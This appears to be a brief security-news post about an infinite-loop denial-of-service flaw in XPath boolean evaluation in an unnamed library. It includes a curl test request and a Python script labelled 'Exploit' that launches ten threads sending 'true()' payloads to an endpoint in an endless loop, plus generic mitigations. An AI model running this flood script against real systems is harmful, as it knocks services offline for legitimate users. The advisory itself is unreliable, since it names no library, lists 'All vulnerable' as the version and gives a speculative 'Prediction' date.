Listen to this Post
The vulnerability exists within the logicalQuery.Select function when processing XPath boolean expressions. When a top-level selector such as “1=1” or “true()” is evaluated, the expression fails to reach a terminating condition. Instead of returning a boolean result, the logic enters an infinite loop. This occurs because the evaluation engine does not correctly identify static boolean values as final results and instead attempts to iterate through non-existent node sets. Each iteration consumes CPU cycles without completing the operation, leading to rapid resource exhaustion. The flaw is triggered by any query where the boolean expression is immediately true, bypassing normal execution flow. No special privileges are required to exploit this; an attacker only needs to send a crafted XPath query to the application. The infinite loop persists until the process is terminated or the system becomes unresponsive. This results in 100% CPU usage on the affected thread, effectively causing a denial of service. The vulnerability affects all deployments that expose XPath querying capabilities to untrusted input.
Platform: XPath Library
Version: All vulnerable
Vulnerability : Infinite loop CPU
Severity: High
Date: Mar 29 2026
Prediction: Apr 12 2026
What Undercode Say:
Test for vulnerability using curl curl -X POST https://target.com/xpath \ -d "<?xml version='1.0'?><query><select>1=1</select></query>" Monitor CPU usage during attack watch -n 1 'ps aux | grep xpath-process | grep -v grep'
Exploit:
import requests
import threading
def dos_attack(url):
payload = "<xpath>true()</xpath>"
while True:
requests.post(url, data=payload, timeout=5)
for _ in range(10):
threading.Thread(target=dos_attack, args=("https://target.com/xpath",)).start()
Protection from this CVE:
- Sanitize user input before XPath evaluation.
- Implement timeouts for query execution.
- Use parameterized XPath queries where possible.
- Deploy rate limiting on API endpoints.
- Update to patched version immediately.
Impact:
- Denial of service via CPU exhaustion.
- Application unavailability for legitimate users.
- Potential cascading failures in shared environments.
- High operational cost for mitigation and recovery.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

